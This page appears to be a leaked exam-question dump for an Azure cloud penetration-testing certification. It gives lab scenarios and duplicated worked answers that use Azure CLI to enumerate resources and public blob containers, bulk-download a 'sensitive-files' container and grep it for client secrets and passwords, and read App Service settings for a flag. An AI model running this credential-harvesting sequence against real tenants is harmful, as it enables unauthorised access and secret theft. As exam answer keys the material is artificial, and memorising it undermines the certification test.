The SecOps Group CCPenX-Az Actual Free Exam Questions & Community Discussion
A compromised developer account has Reader access to a resource group. Enumerate all Azure resources in that resource group and identify the exposed App Service name.
Correct Answer:
See the Answer in Explanation below.
Explanation:
finance-reporting-api
Detailed Solution:
Set the resource group:
RG= " rg-prod-apps-eastus "
List resources:
az resource list \
--resource-group " $RG " \
--output table
Expected output:
Name ResourceGroup Location Type
---------------------- --------------------- ---------- ------------------------------- finance-reporting-api rg-prod-apps-eastus eastus Microsoft.Web/sites prod-reportstore01 rg-prod-apps-eastus eastus Microsoft.Storage/storageAccounts kv-finance-prod rg-prod-apps-eastus eastus Microsoft.KeyVault/vaults The exposed App Service is:
finance-reporting-api
Explanation:
finance-reporting-api
Detailed Solution:
Set the resource group:
RG= " rg-prod-apps-eastus "
List resources:
az resource list \
--resource-group " $RG " \
--output table
Expected output:
Name ResourceGroup Location Type
---------------------- --------------------- ---------- ------------------------------- finance-reporting-api rg-prod-apps-eastus eastus Microsoft.Web/sites prod-reportstore01 rg-prod-apps-eastus eastus Microsoft.Storage/storageAccounts kv-finance-prod rg-prod-apps-eastus eastus Microsoft.KeyVault/vaults The exposed App Service is:
finance-reporting-api
A storage account allows public blob access. Enumerate containers and identify the public container that exposes backup files.
Correct Answer:
See the Answer in Explanation below.
Explanation:
public-backups
Detailed Solution:
Try listing containers using Azure CLI:
az storage container list \
--account-name prodreportstore01 \
--auth-mode login \
--output table
If anonymous access is allowed, test via blob endpoint:
az storage blob list \
--account-name prodreportstore01 \
--container-name public-backups \
--auth-mode key \
--output table
In a lab, you can also test the public URL pattern:
https://prodreportstore01.blob.core.windows.net/public-backups/
Expected exposed container:
public-backups
Final answer:
public-backups
Explanation:
public-backups
Detailed Solution:
Try listing containers using Azure CLI:
az storage container list \
--account-name prodreportstore01 \
--auth-mode login \
--output table
If anonymous access is allowed, test via blob endpoint:
az storage blob list \
--account-name prodreportstore01 \
--container-name public-backups \
--auth-mode key \
--output table
In a lab, you can also test the public URL pattern:
https://prodreportstore01.blob.core.windows.net/public-backups/
Expected exposed container:
public-backups
Final answer:
public-backups
Carefully enumerate the accessible Azure Blob Container to locate a file containing credentials for an App Registration within the tenant. What is the Application/Client ID of the discovered App Registration?
Correct Answer:
See the Answer in Explanation below.
Explanation:
The answer is the clientId, appId, or applicationId value inside the credential file downloaded from the sensitive-files container.
Detailed Solution:
List blobs inside the accessible container:
az storage blob list \
--account-name excaliburstore \
--container-name sensitive-files \
--sas-token " $SAS " \
--query " [].name " \
--output table
Download all files locally:
mkdir blobloot
az storage blob download-batch \
--account-name excaliburstore \
--source sensitive-files \
--destination blobloot \
--sas-token " $SAS "
Search the downloaded files for application credentials:
grep -RniE " clientId|appId|applicationId|clientSecret|tenantId|secret|password " blobloot On Windows PowerShell:
Select-String -Path .\blobloot\* -Pattern " clientId|appId|applicationId|clientSecret|tenantId|secret|password " - CaseSensitive:$false A typical file may look like this:
{
" tenantId " : " f015f36d-c07f-41fb-9bde-fffc3a22ee8b " ,
" clientId " : " < application-client-id > " ,
" clientSecret " : " < application-client-secret > "
}
The clientId / appId value is the answer.
Final answer:
Use the clientId / appId value found in the blob credential file.
Explanation:
The answer is the clientId, appId, or applicationId value inside the credential file downloaded from the sensitive-files container.
Detailed Solution:
List blobs inside the accessible container:
az storage blob list \
--account-name excaliburstore \
--container-name sensitive-files \
--sas-token " $SAS " \
--query " [].name " \
--output table
Download all files locally:
mkdir blobloot
az storage blob download-batch \
--account-name excaliburstore \
--source sensitive-files \
--destination blobloot \
--sas-token " $SAS "
Search the downloaded files for application credentials:
grep -RniE " clientId|appId|applicationId|clientSecret|tenantId|secret|password " blobloot On Windows PowerShell:
Select-String -Path .\blobloot\* -Pattern " clientId|appId|applicationId|clientSecret|tenantId|secret|password " - CaseSensitive:$false A typical file may look like this:
{
" tenantId " : " f015f36d-c07f-41fb-9bde-fffc3a22ee8b " ,
" clientId " : " < application-client-id > " ,
" clientSecret " : " < application-client-secret > "
}
The clientId / appId value is the answer.
Final answer:
Use the clientId / appId value found in the blob credential file.
During App Service enumeration, you discover that the compromised user can read App Service application settings. Find the hidden flag stored in the application settings.
Correct Answer:
See the Answer in Explanation below.
Explanation:
Flag{app_settings_should_not_store_secrets}
Detailed Solution:
Query App Service settings:
az webapp config appsettings list \
--name finance-reporting-api \
--resource-group rg-prod-apps-eastus \
--output json
Search for suspicious keys:
az webapp config appsettings list \
--name finance-reporting-api \
--resource-group rg-prod-apps-eastus \
--query " [?contains(name, ' FLAG ' ) || contains(name, ' Flag ' ) || contains(name, ' SECRET ' )] " \
--output table
Expected output:
Name SlotSetting Value
---------- ------------- ----------------------------------------
APP_FLAG False Flag{app_settings_should_not_store_secrets}
The flag is:
Flag{app_settings_should_not_store_secrets}
Explanation:
Flag{app_settings_should_not_store_secrets}
Detailed Solution:
Query App Service settings:
az webapp config appsettings list \
--name finance-reporting-api \
--resource-group rg-prod-apps-eastus \
--output json
Search for suspicious keys:
az webapp config appsettings list \
--name finance-reporting-api \
--resource-group rg-prod-apps-eastus \
--query " [?contains(name, ' FLAG ' ) || contains(name, ' Flag ' ) || contains(name, ' SECRET ' )] " \
--output table
Expected output:
Name SlotSetting Value
---------- ------------- ----------------------------------------
APP_FLAG False Flag{app_settings_should_not_store_secrets}
The flag is:
Flag{app_settings_should_not_store_secrets}
0
0
0
10
